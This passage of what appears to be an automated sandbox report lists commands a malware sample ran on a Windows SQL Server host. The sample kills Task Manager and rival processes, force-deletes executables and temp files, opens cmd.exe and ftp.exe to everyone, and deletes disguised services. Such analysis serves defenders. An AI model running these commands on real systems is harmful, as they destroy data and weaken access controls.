C:\Windows\SysWOW64\taskkill.exetaskkill /f /im conhoz.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im conhoz.exe2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im conhoz.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im conhoz.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im conhoz.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im conhoz.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im conhoz.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im conhoy.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im conhoy.exe3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im conhoy.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im conhoy.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im csrs.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im csrs.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im csrs.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im csrs.exe3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im sysdo.exe2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sysdo.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im sysdo.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sysdo.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im SqlManagement.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SqlManagement.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\DATA\SqlManagement\sSqlManagement.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\DATA\SqlManagement\SqlManagement.exe2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im SystemManagement.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SystemManagement.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\DATA\SqlManagement\SystemManagement.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\DATA\SqlManagement\SystemManagement.exe2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\DATA\SqlManagement\*2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im taskmgr.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im taskmgr.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\ProgramData\*.vbs2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\ProgramData\*.dll2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\ProgramData\*.txt2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\ProgramData\*.bat2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\ProgramData\*.json2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\ProgramData\*.ini2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\*.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\RECYCLER\*.vbs2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\RECYCLER\*.dll2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\RECYCLER\*.txt2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\RECYCLER\*.bat2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\RECYCLER\*.json2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\RECYCLER\*.ini2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\*.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:/*.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:/RECYCLER/*.ini2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:/RECYCLER/*.json2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:/RECYCLER/*.bat2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:/RECYCLER/*.txt2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:/RECYCLER/*.dll2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:/RECYCLER/*.vbs2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im wscript.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im wscript.exe3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im SQLAGENTSWD.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SQLAGENTSWD.exe3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im SQLAGENTSWA.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SQLAGENTSWA.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im SQLAGENTSWB.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SQLAGENTSWB.exe3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im SQLAGENTSWC.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SQLAGENTSWC.exe3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im SQLAGENAC.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SQLAGENAC.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\2\sqlagentc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\2\sqlagentc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\2\sqlagentc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\2\sqlagentc.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\1\sqlagentc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\1\sqlagentc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\1\sqlagentc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\1\sqlagentc.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\sqlagentc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\sqlagentc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\sqlagentc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\sqlagentc.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlagentc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlagentc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlagentc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlagentc.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\Temp\sqlagentc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\Temp\sqlagentc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\Temp\sqlagentc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\Temp\sqlagentc.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im SQLAGENTC.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SQLAGENTC.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im SQLAGENTC.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SQLAGENTC.exe3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlagentc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlagentc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlagentc.exe /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlagentc.exe /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlagentc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlagentc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlagentc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlagentc.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im SQLAGENTN.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SQLAGENTN.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im SQLAGENTN.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SQLAGENTN.exe3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im SQLAGENTA.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SQLAGENTA.exe3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im SQLAGENTA.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SQLAGENTA.exe3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\MSSQL~1\AppData\Local\Temp\SQLAGEATC.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\MSSQL~1\AppData\Local\Temp\SQLAGEATC.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\Temp\SQLAGEATC.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\Temp\SQLAGEATC.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\Temp\SQLAGEATC.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\Temp\SQLAGEATC.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\MSSQLSERVER\AppData\Local\Temp\SQLAGEATC.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\MSSQLSERVER\AppData\Local\Temp\SQLAGEATC.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\MSSQLSERVER\AppData\Local\Temp\SQLAGEATC.exe /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\MSSQLSERVER\AppData\Local\Temp\SQLAGEATC.exe /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\MSSQL~1\AppData\Local\Temp\SQLAGEATC.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\MSSQL~1\AppData\Local\Temp\SQLAGEATC.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\SQLAGEATC.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\SQLAGEATC.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\SQLAGEATC.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\SQLAGEATC.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\SQLAGEATC.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\SQLAGEATC.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\SQLAGEATC.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\SQLAGEATC.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\1\SQLAGEATC.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\1\SQLAGEATC.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\1\SQLAGEATC.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\1\SQLAGEATC.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\2\SQLAGEATC.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\2\SQLAGEATC.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\2\SQLAGEATC.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\2\SQLAGEATC.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im SQLAGEATC.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SQLAGEATC.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im SQLAGEATC.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SQLAGEATC.exe3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im SQLAGEATN.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SQLAGEATN.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im SQLAGEATN.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SQLAGEATN.exe3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im SQLAGEATA.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SQLAGEATA.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im SQLAGEATA.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SQLAGEATA.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Users\MSSQL~1\AppData\Local\Temp\*2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Users\MSSQLSERVER\AppData\Local\Temp\*2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Windows\Temp\*2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\*2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Users\Administrator\AppData\Local\Temp\*2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Local\TempUpdate2.bat2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\system32\@cacls.exe" /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\SysWOW64\@cacls.exe" /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\system32\@cacls.exe" /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\SysWOW64\@cacls.exe" /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\system32\@cacls.exe" /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\SysWOW64\@cacls.exe" /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\system32\@cacls.exe" /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\SysWOW64\@cacls.exe" /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\system32\cmd.exe" /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\SysWOW64\cmd.exe" /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\system32\cmd.exe" /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\SysWOW64\cmd.exe" /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\system32\cmd.exe" /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\SysWOW64\cmd.exe" /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\system32\cmd.exe" /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\SysWOW64\cmd.exe" /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\system32\ftp.exe" /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\SysWOW64\ftp.exe" /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\system32\ftp.exe" /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\SysWOW64\ftp.exe" /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\system32\ftp.exe" /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\SysWOW64\ftp.exe" /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\system32\ftp.exe" /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\SysWOW64\ftp.exe" /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Gsmarn64.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Gsmarn64.exe3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Gsmarn32.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Gsmarn32.exe3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im CGlobalan.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im CGlobalan.exe3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Windows\SystemCvlsa\*" /t /e /c /r everyone3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Windows\SystemCvlsa\*" /t /e /c /r system3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Windows\SystemCvlsa\CGlobalan.exe" /t /e /c /r everyone3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Windows\SystemCvlsa\CGlobalan.exe" /t /e /c /r system3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Windows\SystemCvlsa\*" /t /e /c /r everyone3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Windows\SystemCvlsa\*" /t /e /c /r system3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Windows\SystemCvlsa\CGlobalan.exe" /t /e /c /r everyone3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Windows\SystemCvlsa\CGlobalan.exe" /t /e /c /r system3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Program Files (x86)\Microsoft BnibabsProt\Gsmarn64.exe" /t /e /c /r everyone3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Program Files (x86)\Microsoft BnibabsProt\Gsmarn64.exe" /t /e /c /r system3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Program Files (x86)\Microsoft BnibabsProt\Gsmarn32.exe" /t /e /c /r everyone3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Program Files (x86)\Microsoft BnibabsProt\Gsmarn32.exe" /t /e /c /r system3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Program Files (x86)\Microsoft BnibabsProt00\Gsmarn64.exe" /t /e /c /r everyone3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Program Files (x86)\Microsoft BnibabsProt00\Gsmarn64.exe" /t /e /c /r system3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Program Files\Microsoft BnibabsProt\Gsmarn64.exe" /t /e /c /r everyone3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Program Files\Microsoft BnibabsProt\Gsmarn64.exe" /t /e /c /r system3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Program Files\Microsoft BnibabsProt\Gsmarn32.exe" /t /e /c /r everyone3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Program Files\Microsoft BnibabsProt\Gsmarn32.exe" /t /e /c /r system3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Program Files\Microsoft BnibabsProt00\Gsmarn64.exe" /t /e /c /r everyone3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Program Files\Microsoft BnibabsProt00\Gsmarn64.exe" /t /e /c /r system3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "CVIDIA AlibabaProtect ClobalSign"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Nsmart64.exe3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Nsmart64.exe3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Nsmart32.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Nsmart32.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Globalan.exe3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Globalan.exe3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Windows\SystemSvlsa\*" /t /e /c /r everyone3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Windows\SystemSvlsa\*" /t /e /c /r system3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Windows\SystemSvlsa\Globalan.exe" /t /e /c /r everyone3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Windows\SystemSvlsa\Globalan.exe" /t /e /c /r system3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Windows\SystemSvlsa\*" /t /e /c /r everyone3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Windows\SystemSvlsa\*" /t /e /c /r system3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Windows\SystemSvlsa\Globalan.exe" /t /e /c /r everyone3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Windows\SystemSvlsa\Globalan.exe" /t /e /c /r system3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Program Files (x86)\Microsoft AlibabaProt\Nsmart64.exe" /t /e /c /r everyone3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Program Files (x86)\Microsoft AlibabaProt\Nsmart64.exe" /t /e /c /r system3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Program Files (x86)\Microsoft AlibabaProt\Nsmart32.exe" /t /e /c /r everyone3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Program Files (x86)\Microsoft AlibabaProt\Nsmart32.exe" /t /e /c /r system3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Program Files (x86)\Microsoft AlibabaProt00\Nsmart64.exe" /t /e /c /r everyone3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Program Files (x86)\Microsoft AlibabaProt00\Nsmart64.exe" /t /e /c /r system3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Program Files\Microsoft AlibabaProt\Nsmart64.exe" /t /e /c /r everyone3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Program Files\Microsoft AlibabaProt\Nsmart64.exe" /t /e /c /r system3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Program Files\Microsoft AlibabaProt\Nsmart32.exe" /t /e /c /r everyone3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Program Files\Microsoft AlibabaProt\Nsmart32.exe" /t /e /c /r system3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Program Files\Microsoft AlibabaProt00\Nsmart64.exe" /t /e /c /r everyone3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Program Files\Microsoft AlibabaProt00\Nsmart64.exe" /t /e /c /r system3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "NVIDIA SlibabaProtect GlobalSign"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im NVDispla64.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im NVDispla64.exe3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im NGlobalan.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im NGlobalan.exee3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Windows\SystemNvlsa\*" /t /e /c /r everyone3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Windows\SystemNvlsa\*" /t /e /c /r system3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Windows\SystemNvlsa\NGlobalan.exe" /t /e /c /r everyone3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Windows\SystemNvlsa\NGlobalan.exe" /t /e /c /r system3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Windows\SystemNvlsa\*" /t /e /c /r everyone3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Windows\SystemNvlsa\*" /t /e /c /r system3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Windows\SystemNvlsa\NGlobalan.exe" /t /e /c /r everyone3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Windows\SystemNvlsa\NGlobalan.exe" /t /e /c /r system3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Program Files (x86)\Microsoft NctiveStec\NVDispla64.exe" /t /e /c /r everyone3⤵
-
